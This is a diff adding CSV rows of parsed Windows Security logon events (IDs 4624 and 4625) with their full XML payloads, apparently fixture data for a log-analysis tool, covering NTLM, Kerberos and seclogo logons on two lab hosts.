+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714758Z"">
+    </TimeCreated>
+    <EventRecordID>137225</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd964</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd8f6</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714613Z"">
+    </TimeCreated>
+    <EventRecordID>137224</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd8f6</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd964</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:25.377120Z"">
+    </TimeCreated>
+    <EventRecordID>137223</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""712"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x25c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4625</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8010000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:23.627952Z"">
+    </TimeCreated>
+    <EventRecordID>137222</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""Status"">0xc000006d</Data>
+    <Data Name=""FailureReason"">%%2313</Data>
+    <Data Name=""SubStatus"">0xc000006a</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:53.407618Z"">
+    </TimeCreated>
+    <EventRecordID>769798</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x85516e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">063B0961-D1B7-6D2C-1FF3-98764C4FAC9D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">53668</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:44.270428Z"">
+    </TimeCreated>
+    <EventRecordID>769794</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x853237</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49959</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:53.407618Z"">
+    </TimeCreated>
+    <EventRecordID>769798</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x85516e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">063B0961-D1B7-6D2C-1FF3-98764C4FAC9D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">53668</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:44.270428Z"">
+    </TimeCreated>
+    <EventRecordID>769794</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x853237</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49959</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
